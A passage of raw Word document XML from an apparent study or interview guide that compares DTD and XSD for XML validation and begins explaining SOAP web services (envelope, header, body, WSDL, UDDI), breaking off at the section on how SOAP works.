        <w:t xml:space="preserve">: XSD allows the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which helps avoid element name conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04872580" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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tronger Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD allows stricter validation and provides rules for </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>min/max occurrences</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default values</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB650BA" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSD is more complex than DTD but provides much more powerful features for validating XML data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043D660" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD supports advanced features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom data types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583DC71"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EACC467" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1787"/>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XSD is the modern choice for XML schema definition and is widely used in enterprise applications, SOAP web services, and XML-based data exchanges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F765BC" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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0B4B498">
          <v:rect id="_x0000_i1966" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72068741" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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Comparison Between DTD and XS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2"/>
        <w:gridCol w:w="2997"/>
        <w:gridCol w:w="5695"/>
      </w:tblGrid>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="0C2E9C40" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F7FBE06" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A9DE4B" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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DTD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C1D5AA" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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XSD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="2A8DE3B0" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="732CED48"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yntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D97DF8A"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Declarative syntax (non-XML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666778B0"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XML-based syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="620CB45A" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2064920F"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Data Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4408FD"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No support for complex data types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4619ACF3"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Supports a wide range of data types (e.g., integer, string, date)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="20252443" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C6FC4E0"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Namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06E09999"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No support for namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71713C59"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Supports namespaces for avoiding element name conflicts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="5C369970" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BECD09E"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Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="570C12AA"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oose validation (limited checks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0534F8BA"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Strong validation with detailed rules (e.g., min/max occurrences, data types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="59A213C8" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A93B6C"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Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385980FE"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Simpler and less powerful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CB6532F"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More complex but more powerful and flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="1AA3847C" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DDB41A"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Interoperability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09531820"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imited support for advanced features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53D12C76" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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Widely used in modern XML applications, including web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E1E45D1" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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80F2B4">
          <v:rect id="_x0000_i1967" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A692251" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E564A86" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1788"/>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lastRenderedPageBreak/>
        <w:t>DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is older, simpler, and has limited validation capabilities. It's mainly used for basic XML structure validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75F35B" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1788"/>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XSD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more robust, supports complex data types, namespaces, and provides stronger validation capabilities, making it the preferred choice for modern XML-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399FCE6A" w14:textId="32691964" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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BD26B3E">
          <v:rect id="_x0000_i1968" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5428E9" w14:textId="7E88220C" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A96C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="_Toc196307881"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain SOAP Web Service</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w14:paraId="22374861" w14:textId="42E48A20" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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SOAP Web Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE087B5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP (Simple Object Access Protocol) Web Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a platform-independent, XML-based communication protocol for exchanging structured information between systems over a network, typically using HTTP or SMTP. It is designed for enabling applications to communicate with each other in a distributed, secure, and standardized way, regardless of the underlying technology stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C2F5C1" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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5E1219A">
          <v:rect id="_x0000_i1969" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE67E" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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Key Components of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754979DD" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1789"/>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OAP Envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The core structure of a SOAP message is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which contains the header and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED50A80" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1789"/>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OAP Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains metadata and optional attributes (e.g., authentication, transaction-related information).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0083AC" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1789"/>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OAP Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the actual message data or payload, which is typically an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C86003" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1789"/>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WSDL (Web Services Description Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP Web Services are usually described using a WSDL file. This file defines the service's operations, input and output parameters, data types, and protocols. It serves as a contract between the web service and the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361816C0" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1789"/>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UDDI (Universal Description, Discovery, and Integration)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>UDDI is a directory service where businesses can register and discover SOAP web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D9E6A" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1789"/>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XML Schema (XSD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Defines the structure of the data exchanged in SOAP messages. It ensures that the SOAP message adheres to a predefined format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52231A1B" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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8D2D7AD">
          <v:rect id="_x0000_i1970" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD503B" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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How SOAP Web Service Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBB9C8" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
